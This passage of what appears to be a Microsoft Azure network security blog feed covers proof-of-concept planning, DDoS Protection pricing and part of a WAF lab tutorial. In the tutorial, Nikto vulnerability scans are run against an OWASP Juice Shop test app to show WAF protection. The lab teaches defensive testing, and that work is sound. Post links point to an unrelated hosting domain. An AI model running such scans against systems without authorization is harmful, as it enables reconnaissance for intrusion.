Cloud native or hybrid solutions. <A href="#" target="_blank" rel="noopener">More information on Cloud design patterns</A></P> <P class="lia-indent-padding-left-60px"><FONT color="#333333"><STRONG>Resources</STRONG></FONT>: Network and Application layer resources. Decide on the <STRONG>focus</STRONG> of your test.</P> <P class="lia-indent-padding-left-60px"><FONT color="#333333"><STRONG>Infrastructure</STRONG></FONT>: Storage, Computing etc. <A href="#" target="_blank" rel="noopener">See more on Azure infrastructure</A></P> <P class="lia-indent-padding-left-60px"><FONT color="#333333"><STRONG>Accessibility</STRONG></FONT>: Multi-factor auth, JIT, Role Permissions, RDP/SSH, <A href="#" target="_blank" rel="noopener">Azure Bastion</A> etc.</P> <P class="lia-indent-padding-left-60px"><STRONG><FONT color="#333333">Connectivity services</FONT>:</STRONG> Virtual WAN, ExpressRoute, VPN Gateway, Virtual network NAT Gateway, Azure DNS etc. <A href="#" target="_blank" rel="noopener">More information on Connectivity services</A></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000"><SPAN>Permissions</SPAN></FONT></H2> <P class="lia-indent-padding-left-30px">Access to resources should be role-based when managing user identities. &nbsp;Conditional access should be granted to resources based on device, identity, assurance, network location, and grant temporary access for other connections. In addition, use JIT and MFA and follow the principle of <A href="#" target="_blank" rel="noopener">least privilege</A> assignment.</P> <P class="lia-indent-padding-left-510px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="conditional access.png" style="width: 91px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/224285i33045214EBB01D39/image-size/large?v=v2&amp;px=999" role="button" title="conditional access.png" alt="conditional access.png" /></span></P> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000">Implementation strategy</FONT></H2> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">It is pertinent to understand which direction your proof of concept should take, such as: how long is the scheduled plan? Is there a dev environment or cluster dedicated to this? What priorities are attached to the application or network infrastructure? A few important guidelines should include:</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-60px"><STRONG><EM>- Build a </EM></STRONG><A href="#" target="_blank" rel="noopener"><STRONG><EM>security containment strategy</EM></STRONG></A>: Align network segmentation with overall strategy and centralize network management and security. Develop and update the security incident response plan as the network changes.</P> <P class="lia-indent-padding-left-60px"><STRONG><EM>- Define success index</EM></STRONG>: This is a practical way to measure the work to be done and set the right expectation from the outcome of the process. Are you testing for feasibility, access control or confirming mitigation? How would you define a successful POC?</P> <P class="lia-indent-padding-left-60px"><STRONG><EM>- Write down</EM></STRONG> the contributors or administrators for each workload/resource for follow-up and task designation. It is pertinent to know who is assigned to a <A href="#" target="_blank" rel="noopener">network contributor</A> role or to a <A href="#" target="_blank" rel="noopener">custom role</A> and who has the appropriate actions listed for the <A href="#" target="_blank" rel="noopener">permissions</A>.</P> <P class="lia-indent-padding-left-60px"><STRONG><EM>- Establish a timeline</EM></STRONG> for the requirements that may be discovered during the POC.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000"><EM>Proof of Concept scenarios &nbsp;</EM></FONT></H2> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT color="#333333">Once the guidelines and framework from above have been established, the next step is to map out the scenario. There are different examples of scenarios that may be considered. If unsure, you can look through this article on <A href="#" target="_blank" rel="noopener">Azure network security best practices</A> to see areas that need improvement and then work on a POC to address the problem.</FONT></P> <P class="lia-indent-padding-left-30px"><FONT color="#333333">Other common examples that an administrator/manager may consider for a POC include:</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H3 class="lia-indent-padding-left-60px"><FONT color="#000000">Network segmentation</FONT></H3> <P class="lia-indent-padding-left-60px">The <A href="#" target="_blank" rel="noopener">logical partition</A> of the network is achieved using subnets, subnets peering and virtual networks to define resource accessibility by roles, users, functions, resource types, user-defined routing, location etc. Examples include:</P> <P class="lia-indent-padding-left-90px"><EM>- Restrict access within a Virtual network by using </EM><A href="#" target="_blank" rel="noopener"><EM>Network Security Groups</EM></A><EM> and Firewall</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Access on-prem resources, cloud and filter internet traffic by creating User-Defined Routes in Azure Firewall</EM></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H3 class="lia-indent-padding-left-60px"><FONT color="#000000">Web Application security</FONT></H3> <P class="lia-indent-padding-left-60px">Requests served by HTTP and HTTPs require different components for the appropriate response type. You may be looking to test for layer 7 attack validation and mitigation or doing a post deployment check.</P> <P class="lia-indent-padding-left-60px">The application may require user-managed or system-managed certificates, protocol support (IPv6 and HTTP/2 traffic), bot management. An administrator may be looking to validate security prone issues. Example of POCs for web application security include:</P> <P class="lia-indent-padding-left-90px"><EM>- Web-App vulnerability protection from SQL injection</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Geo-based access control and rate limiting</EM></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H3 class="lia-indent-padding-left-60px"><FONT color="#000000">Ingress and Egress traffic management</FONT></H3> <P class="lia-indent-padding-left-60px">This includes a series of tests around how traffic is managed from one node to the other within and outside the network. Examples of POCs might include remote connectivity, intra-VLAN routing, forced tunneling, geolocation management, content distribution etc. Examples of this POC include:</P> <P class="lia-indent-padding-left-90px"><EM>- DNAT access by </EM><EM>RDP protocol to Windows client</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Bastion connectivity to a virtual network</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Path-Based Routing for resources in a backend pool.</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Secured Virtual Hub to connect virtual WAN resources.</EM></P> <P class="lia-indent-padding-left-30px"><EM>&nbsp;</EM></P> <H3 class="lia-indent-padding-left-60px"><FONT color="#000000">DDOS attack simulation</FONT></H3> <P class="lia-indent-padding-left-60px">Insights into how resources with public facing interfaces handle DDOS attacks and deny access to legitimate users is a common POC. Validation of your threshold values, how your Azure networking environment responds to volumetric or protocol attacks, and the report generation are common instances you may want to review. Examples of this POC include:</P> <P class="lia-indent-padding-left-90px"><EM>- Simulate DDoS attack through a Microsoft approved partner.</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Rate limiting access for a specific IP address.</EM></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2 class="lia-indent-padding-left-30px">&nbsp;</H2> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000">Monitor the process</FONT></H2> <P class="lia-indent-padding-left-390px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="monitorprocess.png" style="width: 229px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/224287i80C523CF34774EB9/image-dimensions/229x80?v=v2" width="229" height="80" role="button" title="monitorprocess.png" alt="monitorprocess.png" /></span></P> <P class="lia-indent-padding-left-330px">&nbsp;</P> <P class="lia-indent-padding-left-30px">Monitoring the proof of concept <FONT color="#000000">behavior</FONT> as you perform the process is essential for aggregating feedback.</P> <P class="lia-indent-padding-left-30px">Log Analytics is the primary tool in the Azure portal for writing log queries and interactively analyzing their results.</P> <P class="lia-indent-padding-left-30px"><A href="#" target="_blank" rel="noopener">NSG flow Logs</A> provide information about the flow of IP addresses in NSGs. It is vital and <A href="#" target="_blank" rel="noopener">highly <EM>recommended</EM></A> for more understanding of your network traffic.</P> <P class="lia-indent-padding-left-30px"><BR />Also, confirm that <STRONG>diagnostic logging</STRONG> is enabled for your resource through the Azure portal. This could take a few minutes to show the results during a test.</P> <P class="lia-indent-padding-left-30px">Diagnostic logs provide insight into Azure operations that were performed within the data plane of an Azure resource. <A href="#" target="_blank" rel="noopener">Follow this link for more on diagnostics logging</A>.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><A href="#" target="_blank" rel="noopener">Network Performance Monitor</A> is a cloud-based hybrid network monitoring solution that could be used to monitor network performance between various points in your network infrastructure and connectivity to application endpoints. <A href="#" target="_blank" rel="noopener">Follow this guideline</A> to set up performance monitoring, Service Connectivity monitoring and Express-route monitoring.</P> <P class="lia-indent-padding-left-30px">For a complete guide on monitoring your network, follow this 5<A href="#" target="_blank" rel="noopener"> minute start video guide</A>.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000"><SPAN><STRONG>Conclusion</STRONG></SPAN></FONT></H2> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">There are many reasons why you may want to do a POC. This series is focused on creating a direction for a network security POC for layer3-4 and layer 7. &nbsp;Once you are clear on what you are testing for (e.g. WAF performance, DDOS mitigation/response or custom rules), proceed to the implementation strategy.</P> <P class="lia-indent-padding-left-30px">In summary, <A href="#" target="_blank" rel="noopener">align your network segmentation</A> model with the enterprise segmentation model for your organization. Delegation models that are well aligned improve automation and make for quick fault isolation. A recommended approach for production enterprise is to allow resources to initiate and respond to cloud requests through cloud network security devices.</P> <P class="lia-indent-padding-left-30px"><BR />As a rule, always <A href="#" target="_blank" rel="noopener">adopt a Zero Trust approach</A><SPAN>.</SPAN></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><EM>(In the <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-2-deploying-the/ba-p/1773168" target="_self">next</A> part of this series, we build an environment to do a POC, using some of the examples in the Proof of Concept scenarios mentioned in this blogpost. You will be able to follow the steps in the article to do some POC examples)</EM></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> Thu, 11 Feb 2021 21:23:30 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-1-planning/ba-p/1746368 tobiotolorin 2021-02-11T21:23:30Z New, Simplified Pricing for Azure DDoS Protection Standard https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-simplified-pricing-for-azure-ddos-protection-standard/ba-p/2119336 <P>Changes were made recently to the <A href="#" target="_blank">pricing structure of Azure DDoS Protection Standard</A> which amount to both less cost and more simplicity in understanding and estimating charges. In this post, we will discuss what specifically changed and refresh your understanding of how pricing is calculated.</P> <P>&nbsp;</P> <H2>What Changed?</H2> <P>&nbsp;</P> <P>We removed the data egress charge for DDoS Protection. This charge could be difficult to understand, and even more difficult to estimate across an environment protected by DDoS Protection. Even though the data charges only accounted for a small percentage of most customers’ costs, they tended to create an unnecessary hassle for cost management.</P> <P>&nbsp;</P> <P>The old pricing model is pictured below:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_0-1612894532017.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/253664iD663CEFFB6954360/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_0-1612894532017.png" alt="Anthony_Roman_0-1612894532017.png" /></span></P> <P>&nbsp;</P> <P>The new, simpler model follows:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_1-1612894532022.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/253663i99F804F38CA917C8/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_1-1612894532022.png" alt="Anthony_Roman_1-1612894532022.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>The Components of DDoS Protection Standard</H2> <P>&nbsp;</P> <P>Azure DDoS Protection Standard consists of the following direct and related components, which you should take some time to understand:</P> <UL> <LI>DDoS Protection Plans – This is the primary component of the service. Most customers will only need one plan.</LI> <LI>Tenants – One DDoS Protection Plan can provide protection for an entire tenant. If you have multiple tenants, then you will need multiple plans.</LI> <LI>Subscriptions – Within the same tenant, any number of subscriptions can share the same plan.</LI> <LI>Virtual Networks (VNets) – VNets are the object to which plans are attached. Once VNets are attached to the plan, resources within those VNets are protected.</LI> <LI>Public IP Addresses – These are the resources that are being protected by the DDoS Protection plan.</LI> </UL> <P>&nbsp;</P> <H2>Calculating Cost</H2> <P>&nbsp;</P> <P>It is always helpful to have a refresher for how to calculate costs before provisioning a DDoS Protection Plan and attaching it to VNets to start protecting resources.</P> <P>&nbsp;</P> <P>The first step in cost calculation is to understand how many public IP addresses are associated to each protected VNet. Of course, public IP addresses do not exist on private virtual networks, but for eligible resources they are associated to other resources which are attached to the VNet.</P> <P>&nbsp;</P> <P>Eligible public IP addresses include those attached to Application Gateways, Bastions, Load Balancers, Azure Firewalls, VPN Gateways, VMs, and virtual appliances. Unsupported resources include some PaaS services like API Management, Logic Apps, Event Hub, and App Service Environments.</P> <P>&nbsp;</P> <P>Some examples include:</P> <UL> <LI>An Azure Firewall has 3 public IP addresses (default is 1, but more can be added). The Azure Firewall subnet is part of a VNet which is associated with a DDoS Protection plan. This represents 3 protected IP addresses.</LI> <LI>A VM has a public IP address associated with its network interface. That network interface also has a private IP address in a VNet associated with a DDoS Protection plan. This represents 1 protected IP.</LI> <LI>An Azure Bastion instance has a public IP address, and the Bastion subnet is within a protected VNet. This represents 1 protected IP address.</LI> <LI>An Application Gateway v2 (with WAF of course) has 1 public IP address, and is configured to auto-scale to a maximum of 100 instances. The App Gateway subnet is in a VNet associated to the DDoS plan. This represents 1 protected IP.</LI> </UL> <P>&nbsp;</P> <P>An added benefit of the last scenario mentioned is that when Application Gateway with WAF is deployed in a DDoS protected VNet, there are no additional charges for WAF - you pay for the Application Gateway at the <A href="#" target="_blank">lower non-WAF rate</A>.</P> <P>&nbsp;</P> <P>Another key point to make is that billing is calculated hourly, not monthly. In other words, you can turn the service on for testing and pay only for what you use, not the whole month. For production deployments, it is best to leave the service active at all times due to its adaptive tuning.</P> <P>&nbsp;</P> <P>Now that you have a sense of what counts as a protected IP address, and you know what the charges are (~$3,000/month for up to 100 protected IPs plus $30/month for each IP over 100), let’s consider some simple examples:</P> <P>&nbsp;</P> <TABLE> <TBODY> <TR> <TD width="89"> <P>Tenants</P> </TD> <TD width="89"> <P>Plans Required</P> </TD> <TD width="89"> <P>Subscriptions</P> </TD> <TD width="89"> <P>VNets</P> </TD> <TD width="89"> <P>Protected IP Addresses</P> </TD> <TD width="89"> <P>Cost/month</P> </TD> <TD width="89"> <P>Math</P> </TD> </TR> <TR> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>10</P> </TD> <TD width="89"> <P>50</P> </TD> <TD width="89"> <P>25</P> </TD> <TD width="89"> <P>$2944</P> </TD> <TD width="89"> <P>&nbsp;</P> </TD> </TR> <TR> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>150</P> </TD> <TD width="89"> <P>400</P> </TD> <TD width="89"> <P>100</P> </TD> <TD width="89"> <P>$2944</P> </TD> <TD width="89"> <P>&nbsp;</P> </TD> </TR> <TR> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>150</P> </TD> <TD width="89"> <P>400</P> </TD> <TD width="89"> <P>150</P> </TD> <TD width="89"> <P>$4444</P> </TD> <TD width="89"> <P>2944 + (30 x 50)</P> </TD> </TR> <TR> <TD width="89"> <P>2</P> </TD> <TD width="89"> <P>2</P> </TD> <TD width="89"> <P>100</P> </TD> <TD width="89"> <P>200</P> </TD> <TD width="89"> <P>100 (50 per tenant)</P> </TD> <TD width="89"> <P>$5888</P> </TD> <TD width="89"> <P>2944 x 2</P> </TD> </TR> <TR> <TD width="89"> <P>2</P> </TD> <TD width="89"> <P>2</P> </TD> <TD width="89"> <P>150</P> </TD> <TD width="89"> <P>300</P> </TD> <TD width="89"> <P>150 (125/25)</P> </TD> <TD width="89"> <P>$6638</P> </TD> <TD width="89"> <P>2944 + (2944 + (25 x 30))</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>We hope this pricing change helps simplify the exercise of cost planning for a DDoS Protection Standard deployment.</P> Tue, 09 Feb 2021 18:22:08 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-simplified-pricing-for-azure-ddos-protection-standard/ba-p/2119336 Anthony_Roman 2021-02-09T18:22:08Z Part 2 - Reconnaissance Playbook: Azure WAF Security Protection and Detection Lab https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751 <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Tutorial: Reconnaissance Playbook</FONT></H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>The second tutorial in this four-part series for Azure WAF protection and detection lab is the reconnaissance playbook.&nbsp; The purpose of the Azure WAF security protection lab is to demonstrate <STRONG>Azure WAF</STRONG>'s capabilities in identifying and protecting against suspicious activities and potential attacks against your web applications. This playbook explains how to test Azure WAF's protections against a <STRONG>reconnaissance attack</STRONG> with emphasis on Azure WAF protection ruleset and logging capabilities.&nbsp; The lab does not include advanced application security concepts and is not intended to be a reference for application security testing as these areas are broader than the use cases demonstrated herein.</P> <P>&nbsp;</P> <P>This playbook demonstrates the web application protection capabilities of Azure WAF against a simulated reconnaissance (recon) attack from common, real-world, publicly available hacking and attack tools.</P> <P>&nbsp;</P> <P>In this tutorial you will:</P> <OL> <LI>Run web application vulnerability scan against the target <STRONG>OWASP Juice Shop</STRONG> web application directly and then scan the same instance of the web application published through Azure WAF</LI> <LI>Review the differences in the results of the two web application vulnerability scans</LI> <LI>Review the summarized logs in the WAF Workbook (<A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A>)</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Prerequisites</H2> <P>&nbsp;</P> <P><A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">A completed Azure WAF security lab setup</A></P> <P>&nbsp;</P> <UL> <LI>We recommend following the lab setup instructions as closely as possible. The closer your lab is to the suggested lab setup, the easier it will be to follow the Azure WAF testing procedures</LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Reconnaissance Attack</H2> <P>&nbsp;</P> <P>Before an attacker can exploit a vulnerability, they will typically spend time researching their target web application which involves collecting application specific data and analyzing it for potential vulnerabilities.&nbsp; One of the methods for collecting sensitive security data to identify potential vulnerabilities in a web application is to utilize <STRONG>web application security vulnerability scanners</STRONG>.&nbsp; These scanners can analyze an application’s response headers to identify potential vulnerabilities.&nbsp; Data collected with web application vulnerability scanners can reveal potential vulnerabilities that an attacker could then test, develop, and leverage for exploitation or exfiltration.&nbsp; Such reconnaissance activities also allow attackers to gain a thorough understanding and complete mapping of your application for later use.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Performing Reconnaissance with Web Application Vulnerability Scanner</H2> <P>&nbsp;</P> <P>One of the first things an attacker will attempt is to try and gain extensive understanding of the application components, framework, and the potential vulnerabilities in a target web application.&nbsp; The quickest, most common method of doing this is to use a commercial or an open source web application vulnerability scanner (also called security scanners) to run unauthenticated/unauthorized scans against a target.&nbsp; In this tutorial, you will run two web application vulnerability scans against the target web application</P> <P>&nbsp;</P> <OL> <LI><STRONG>First scan</STRONG> will point to the target web application directly</LI> <UL> <LI>URL: http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</LI> </UL> <LI><STRONG>Second scan</STRONG> will point to the same target web application protected by Azure WAF on Application Gateway</LI> <UL> <LI>URL: <A href="#" target="_blank" rel="noopener">http://juiceshopthruwaf.com</A></LI> </UL> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Running Web Application Vulnerability Scan against the Target Application</H3> <P>&nbsp;</P> <P>To run the web application vulnerability scans, we will connect to the Kali VM with RDP.&nbsp; Once connected, we will use <A href="#" target="_blank" rel="noopener"><STRONG>Nikto</STRONG></A>, a versatile, command line open source web application vulnerability scanning tool which is bundled in the Kali Linux distro. &nbsp;When pointed to the target web application, Nikto will scan the application for common vulnerabilities and display the scan output in the terminal window for quick review.</P> <P>&nbsp;</P> <OL> <LI>Sign into the Kali Linux VM using your lab credentials</LI> <LI>Launch the web browser and ensure that you are able to access the OWASP Juice Shop website directly with URL http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net and also through WAF with URL <A href="#" target="_blank" rel="noopener">http://juiceshopthruwaf.com</A></LI> <LI>Launch two instances of <STRONG>Nikto</STRONG> Web Vulnerability Scanner.&nbsp; Click on <STRONG>Applications</STRONG> on the top left and then click <STRONG>Web Application Analysis --&gt; Web Vulnerability Scanners --&gt; Nikto</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609887818173.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244418i91B6B5066429C6E5/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_0-1609887818173.png" alt="Mohit_Kumar_0-1609887818173.png" /></span></P> <P>&nbsp;</P> <OL start="4"> <LI>To initiate the scans, utilize the following commands.&nbsp; One in each of the open Nikto windows <OL class="lia-list-style-type-lower-alpha"> <LI><STRONG>nikto -h http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</STRONG></LI> <LI><STRONG>nikto -h <A href="#" target="_blank" rel="noopener">http://juiceshopthruwaf.com</A></STRONG></LI> </OL> </LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tips</STRONG></FONT> <UL class="lia-list-style-type-disc"> <LI><FONT size="2">To display verbose output in Nikto, use the following command</FONT><BR /> <UL class="lia-list-style-type-circle"> <LI><FONT size="2">nikto -h &lt;<U>http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</U>&gt; -Display v</FONT></LI> </UL> </LI> <LI><FONT size="2">To save Nikto output to a file to review later, use the following command</FONT><BR /> <UL class="lia-list-style-type-circle"> <LI><FONT size="2">nikto -h &lt;<U>http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</U>&gt; -Save ./juiceshopdirect.htm&nbsp;</FONT></LI> </UL> </LI> </UL> </LI> </UL> <P>&nbsp;</P> <H3><FONT size="3">Reviewing Web Application Vulnerability Scan Results</FONT></H3> <P>&nbsp;</P> <P>After the scans finish running, we can quickly review the results by looking at the highlighted lines in the figures below.</P> <P>&nbsp;</P> <OL> <LI>When going to the Juice Shop website directly, we see that the scanner sent <STRONG>7k+</STRONG> <STRONG>requests<SUP>1</SUP></STRONG> to the web server and as a result found <STRONG>2 errors</STRONG> and <STRONG>150+ items/issues</STRONG> which could then be used to develop further attack and exploitation scenarios</LI> </OL> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 1 (Scan Start)</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609888445044.png" style="width: 627px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244419i2BC879A6A6154E75/image-dimensions/627x395?v=v2" width="627" height="395" role="button" title="Mohit_Kumar_0-1609888445044.png" alt="Mohit_Kumar_0-1609888445044.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 2 (Scan End)</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609796992288.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244011i8E5E9A77D218B7FB/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609796992288.png" alt="Mohit_Kumar_2-1609796992288.png" /></span></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><FONT color="#FF0000"><STRONG>!</STRONG></FONT><STRONG> IMPORTANT</STRONG>: &nbsp;For the scenarios demonstrated in this document, OWASP Juice Shop application was running on HTTP port 3000.&nbsp; This is not the case when you use the Azure WAF Attack Testing Lab Deployment Template as it configures the application to run on port 80, 443 and assigns it a URL.&nbsp; For the lab tutorials, you will connect to the application on HTTP port 80 only.&nbsp; The URL for the application will be http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net.&nbsp; &lt;deployment guid&gt; is unique to every deployment</FONT></P> <P>&nbsp;</P> <OL start="2"> <LI>While scanning Juice Shop website through the Azure WAF, we see that the scanner made <STRONG>&gt;3x the number of</STRONG> <STRONG>requests<SUP>1</SUP></STRONG> when compared to scanning the website directly in Step 1 and still it <STRONG>did not find any errors</STRONG> to report.&nbsp; Similarly, this scan is only able to report <STRONG>&lt;1% of the number of items/issues</STRONG> for further investigation as compared to when scanning the website directly</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><STRONG style="font-family: inherit;"><SUP>1</SUP></STRONG><FONT size="2" style="font-family: inherit;"> Request count for http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net taken from baseline of scans for comparison</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609888844466.png" style="width: 627px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244420i0358066759AB0C54/image-dimensions/627x394?v=v2" width="627" height="394" role="button" title="Mohit_Kumar_0-1609888844466.png" alt="Mohit_Kumar_0-1609888844466.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H4>&nbsp;</H4> <H2>Understanding What Happened</H2> <P>&nbsp;</P> <P>Upon reviewing the Nikto scan outputs, we see the pattern as shown in the below table.&nbsp; This clearly indicates that when going through the Azure WAF, the scanner is not as effective in assessing the web application and identifying potential vulnerabilities.</P> <P>&nbsp;</P> <TABLE border="1" width="99.86187845303867%"> <TBODY> <TR> <TD width="33.28729281767956%" height="57px"> <P><STRONG>Recon Scan Route</STRONG></P> </TD> <TD width="33.28729281767956%" height="57px"> <P class="lia-align-center"><STRONG>No. of Issues</STRONG></P> </TD> <TD width="33.28729281767956%" height="57px"> <P><STRONG>No. of Items for Investigation</STRONG></P> </TD> </TR> <TR> <TD width="33.28729281767956%" height="30px"> <P>Direct</P> </TD> <TD width="33.28729281767956%" height="30px" class="lia-align-center"> <P>2</P> </TD> <TD width="33.28729281767956%" height="30px" class="lia-align-center"> <P>167</P> </TD> </TR> <TR> <TD width="33.28729281767956%" height="30px"> <P>Through WAF</P> </TD> <TD width="33.28729281767956%" height="30px" class="lia-align-center"> <P>0</P> </TD> <TD width="33.28729281767956%" height="30px" class="lia-align-center"> <P>3</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Now let us use the <A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A> to understand how WAF handled traffic from the <STRONG>Nikto </STRONG>security scanner.&nbsp; This workbook visualizes security relevant WAF events across several filterable panels.&nbsp; <EM>It works with all WAF types, including Application Gateway, Front Door, and CDN, and can be filtered based on WAF type or a specific WAF instance.</EM></P> <P>&nbsp;</P> <P><A title="Deploy Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener noopener noreferrer">Click here</A>&nbsp;to deploy&nbsp;<STRONG>Azure Monitor Workbook for WAF</STRONG>&nbsp;to your subscription in Azure.</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; To understand what is happening when scan traffic destined for the Juice Shop application goes through the Azure WAF, you can also examine the log entries associated with <STRONG>ApplicationGatewayFirewallLog </STRONG>in the<STRONG> Azure Monitor</STRONG></FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Reviewing WAF logs in the Workbook</H3> <P>&nbsp;</P> <OL> <LI>You can access the WAF workbook by going into the Workbook blade and then selecting the WAF workbook deployed for this lab.&nbsp; Once in the workbook, ensure that you have selected the appropriate <STRONG>Time Range</STRONG>, <STRONG>WAF Type and WAF Items </STRONG>in the event filters</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1610145342692.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244984i68DFC89B9DCDB226/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1610145342692.png" alt="Mohit_Kumar_0-1610145342692.png" /></span></P> <P>&nbsp;</P> <OL start="2"> <LI>You should also ensure that you have selected the correct Public IP address for your attacker machine (Kali VM) in the <STRONG>Top 10 Attacking IP Addresses,</STRONG><STRONG> filter to single IP address </STRONG>pane<STRONG>. </STRONG></LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; If you are using the <SPAN>Azure WAF Attack Testing Lab Environment Deployment Template</SPAN> and have followed the lab setup instructions then the client IP address will be the public IP address of the Azure Firewall in your demo environment</FONT></LI> </UL> <P><STRONG>&nbsp;</STRONG></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609889556104.png" style="width: 999px;"><img 